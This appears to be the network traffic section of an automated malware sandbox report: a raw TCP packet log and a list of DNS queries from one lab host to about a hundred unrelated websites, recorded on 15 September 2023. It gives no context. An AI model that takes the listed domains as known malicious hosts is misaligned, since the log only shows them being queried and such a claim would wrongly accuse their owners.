                                                                                                                                                                              Sep 15, 2023 07:26:57.150346041 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150362968 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150381088 CEST804995381.2.194.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150409937 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150707960 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150784969 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150806904 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150835991 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150859118 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.150902987 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.150952101 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.151001930 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.151066065 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.151140928 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.151158094 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.151207924 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.151237011 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.151281118 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.155210972 CEST804995381.2.194.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.155270100 CEST4995380192.168.2.381.2.194.241
                                                                                                                                                                              Sep 15, 2023 07:26:57.166093111 CEST80499553.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.166131973 CEST80499553.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.166160107 CEST4995580192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:57.166191101 CEST4995580192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:57.173641920 CEST4995580192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:57.184715033 CEST804985672.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.184772968 CEST804995872.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.184844017 CEST4995880192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:57.190603971 CEST4995380192.168.2.381.2.194.241
                                                                                                                                                                              Sep 15, 2023 07:26:57.190614939 CEST4995880192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:57.190958977 CEST8049948202.254.236.40192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.191042900 CEST4994880192.168.2.3202.254.236.40
                                                                                                                                                                              Sep 15, 2023 07:26:57.213680029 CEST8049957217.19.237.54192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.213771105 CEST4995780192.168.2.3217.19.237.54
                                                                                                                                                                              Sep 15, 2023 07:26:57.213960886 CEST4995780192.168.2.3217.19.237.54
                                                                                                                                                                              Sep 15, 2023 07:26:57.217255116 CEST4995980192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:57.219770908 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220017910 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220031023 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220062971 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220259905 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220279932 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220279932 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220325947 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220527887 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220628977 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220701933 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220721960 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220779896 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220779896 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220779896 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220779896 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220797062 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220820904 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220868111 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.220875978 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220875978 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.220916033 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:57.255842924 CEST8049954108.167.164.216192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.255961895 CEST4995480192.168.2.3108.167.164.216
                                                                                                                                                                              Sep 15, 2023 07:26:57.280519962 CEST80499553.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.301800966 CEST804995872.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.303217888 CEST804995872.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:57.303239107 CEST804995872.44.93.236192.168.2.3
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Sep 15, 2023 07:26:03.853924990 CEST192.168.2.38.8.8.80xf493Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.853924990 CEST192.168.2.38.8.8.80x9bcdStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.854087114 CEST192.168.2.38.8.8.80x78daStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.855576992 CEST192.168.2.38.8.8.80xb0cfStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.856692076 CEST192.168.2.38.8.8.80x5d6dStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.857846022 CEST192.168.2.38.8.8.80x669eStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.858979940 CEST192.168.2.38.8.8.80x61c6Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.859849930 CEST192.168.2.38.8.8.80x12f6Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.860445976 CEST192.168.2.38.8.8.80xf028Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.860872984 CEST192.168.2.38.8.8.80xb20fStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.266499043 CEST192.168.2.38.8.8.80xd214Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.511755943 CEST192.168.2.38.8.8.80xe00cStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.511853933 CEST192.168.2.38.8.8.80xd053Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.591660976 CEST192.168.2.38.8.8.80x6124Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.765974998 CEST192.168.2.38.8.8.80x34adStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.766105890 CEST192.168.2.38.8.8.80xa30aStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.869556904 CEST192.168.2.38.8.8.80x61c6Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.886327028 CEST192.168.2.38.8.8.80x5d04Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.105818987 CEST192.168.2.38.8.8.80xad78Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.125742912 CEST192.168.2.38.8.8.80x80eStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.126308918 CEST192.168.2.38.8.8.80x2d21Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.400494099 CEST192.168.2.38.8.8.80x818eStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.640465021 CEST192.168.2.38.8.8.80xcf62Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.782829046 CEST192.168.2.38.8.8.80x33aeStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.882503986 CEST192.168.2.38.8.8.80x61c6Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.070606947 CEST192.168.2.38.8.8.80x44a5Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.137569904 CEST192.168.2.38.8.8.80x2d21Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.173846960 CEST192.168.2.38.8.8.80x3301Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.174128056 CEST192.168.2.38.8.8.80x5cadStandard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.269957066 CEST192.168.2.38.8.8.80x7c3fStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.525829077 CEST192.168.2.38.8.8.80xcb3dStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.528443098 CEST192.168.2.38.8.8.80x997Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.841013908 CEST192.168.2.38.8.8.80x4f44Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.842627048 CEST192.168.2.38.8.8.80x4ed0Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.844225883 CEST192.168.2.38.8.8.80x70e8Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.010257006 CEST192.168.2.38.8.8.80x2a36Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.068075895 CEST192.168.2.38.8.8.80xde70Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.356175900 CEST192.168.2.38.8.8.80x698fStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.715495110 CEST192.168.2.38.8.8.80xcbb2Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.716331959 CEST192.168.2.38.8.8.80x3fcStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.835330009 CEST192.168.2.38.8.8.80x4f44Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.138299942 CEST192.168.2.38.8.8.80xe2abStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.139281988 CEST192.168.2.38.8.8.80xe77fStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.140300989 CEST192.168.2.38.8.8.80x30e2Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.153927088 CEST192.168.2.38.8.8.80x3c23Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.279818058 CEST192.168.2.38.8.8.80xa624Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.562750101 CEST192.168.2.38.8.8.80x12aStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.565087080 CEST192.168.2.38.8.8.80x2caeStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.699836016 CEST192.168.2.38.8.8.80xb4a6Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.749340057 CEST192.168.2.38.8.8.80x284dStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.813703060 CEST192.168.2.38.8.8.80x5e2cStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.852879047 CEST192.168.2.38.8.8.80x4f44Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.034651995 CEST192.168.2.38.8.8.80xf62dStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.169286013 CEST192.168.2.38.8.8.80xe0e1Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.418849945 CEST192.168.2.38.8.8.80x6872Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.597239971 CEST192.168.2.38.8.8.80x850aStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.743165970 CEST192.168.2.38.8.8.80xac6fStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.923201084 CEST192.168.2.38.8.8.80x62e7Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.923201084 CEST192.168.2.38.8.8.80xcd39Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.337363005 CEST192.168.2.38.8.8.80xb785Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.341489077 CEST192.168.2.38.8.8.80x2adfStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.748550892 CEST192.168.2.38.8.8.80xc56bStandard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.774183035 CEST192.168.2.38.8.8.80x1aecStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.883888006 CEST192.168.2.38.8.8.80x4f44Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.924779892 CEST192.168.2.38.8.8.80x5f71Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.000415087 CEST192.168.2.38.8.8.80x4efdStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.312017918 CEST192.168.2.38.8.8.80x45f8Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.448034048 CEST192.168.2.38.8.8.80xf94cStandard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.792834044 CEST192.168.2.38.8.8.80xb147Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.796973944 CEST192.168.2.38.8.8.80xc582Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.032371044 CEST192.168.2.38.8.8.80x57f5Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.743876934 CEST192.168.2.38.8.8.80x27eStandard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:13.177634001 CEST192.168.2.38.8.8.80x64a0Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:13.182022095 CEST192.168.2.38.8.8.80x2d18Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:14.220653057 CEST192.168.2.38.8.8.80x3abdStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:14.588882923 CEST192.168.2.38.8.8.80x7b92Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:15.243633986 CEST192.168.2.38.8.8.80x6b14Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:15.250185966 CEST192.168.2.38.8.8.80x1ebaStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.683625937 CEST192.168.2.38.8.8.80xbd7bStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.709152937 CEST192.168.2.38.8.8.80xc50bStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.711591959 CEST192.168.2.38.8.8.80x7737Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.711710930 CEST192.168.2.38.8.8.80x4adcStandard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.712543964 CEST192.168.2.38.8.8.80x651eStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.712619066 CEST192.168.2.38.8.8.80x840fStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.715915918 CEST192.168.2.38.8.8.80x7fd3Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.716149092 CEST192.168.2.38.8.8.80xf0cStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.717330933 CEST192.168.2.38.8.8.80xee73Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.717466116 CEST192.168.2.38.8.8.80x2d9cStandard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.117945910 CEST192.168.2.38.8.8.80x542eStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.320163012 CEST192.168.2.38.8.8.80x9fcdStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.320163012 CEST192.168.2.38.8.8.80xdd4aStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.385288954 CEST192.168.2.38.8.8.80xdaf1Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.615732908 CEST192.168.2.38.8.8.80xbbd4Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.623564005 CEST192.168.2.38.8.8.80x4403Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.792592049 CEST192.168.2.38.8.8.80x840fStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.870228052 CEST192.168.2.38.8.8.80x3f55Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.871515036 CEST192.168.2.38.8.8.80x9fd6Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.875730991 CEST192.168.2.38.8.8.80xa85cStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.992096901 CEST192.168.2.38.8.8.80xf5faStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.143120050 CEST192.168.2.38.8.8.80x77d9Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.143120050 CEST192.168.2.38.8.8.80x8a8Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.388900995 CEST192.168.2.38.8.8.80xf920Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.495817900 CEST192.168.2.38.8.8.80x326cStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.819369078 CEST192.168.2.38.8.8.80x2c2aStandard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.819576025 CEST192.168.2.38.8.8.80x840fStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.820034027 CEST192.168.2.38.8.8.80xbfb0Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.821014881 CEST192.168.2.38.8.8.80x7853Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.940813065 CEST192.168.2.38.8.8.80xb566Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.193665981 CEST192.168.2.38.8.8.80x3942Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.420356989 CEST192.168.2.38.8.8.80x7761Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.521811962 CEST192.168.2.38.8.8.80xba07Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.791291952 CEST192.168.2.38.8.8.80xc159Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.943516970 CEST192.168.2.38.8.8.80x3530Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.186933041 CEST192.168.2.38.8.8.80xe1ccStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.435229063 CEST192.168.2.38.8.8.80x7761Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.470546007 CEST192.168.2.38.8.8.80x6ec2Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.471221924 CEST192.168.2.38.8.8.80x6289Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.747297049 CEST192.168.2.38.8.8.80xdee7Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.992204905 CEST192.168.2.38.8.8.80xee34Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.994729042 CEST192.168.2.38.8.8.80x670dStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.000212908 CEST192.168.2.38.8.8.80x782fStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.071175098 CEST192.168.2.38.8.8.80x976aStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.201607943 CEST192.168.2.38.8.8.80x36d5Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.462740898 CEST192.168.2.38.8.8.80xf8f1Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.463247061 CEST192.168.2.38.8.8.80xd325Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.624911070 CEST192.168.2.38.8.8.80xffe0Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.799963951 CEST192.168.2.38.8.8.80xb69fStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.799963951 CEST192.168.2.38.8.8.80x679eStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.804601908 CEST192.168.2.38.8.8.80x6feeStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.059338093 CEST192.168.2.38.8.8.80x9e41Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.495740891 CEST192.168.2.38.8.8.80xdb45Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.532274008 CEST192.168.2.38.8.8.80x304bStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.537993908 CEST192.168.2.38.8.8.80xd9baStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.549458981 CEST192.168.2.38.8.8.80xbc8fStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.792387009 CEST192.168.2.38.8.8.80xedd5Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.796108007 CEST192.168.2.38.8.8.80xbc9cStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.936664104 CEST192.168.2.38.8.8.80x3183Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.019740105 CEST192.168.2.38.8.8.80x99d9Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.135665894 CEST192.168.2.38.8.8.80x863eStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.239922047 CEST192.168.2.38.8.8.80xb5c0Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.254723072 CEST192.168.2.38.8.8.80xf9dcStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.455054998 CEST192.168.2.38.8.8.80x3e82Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
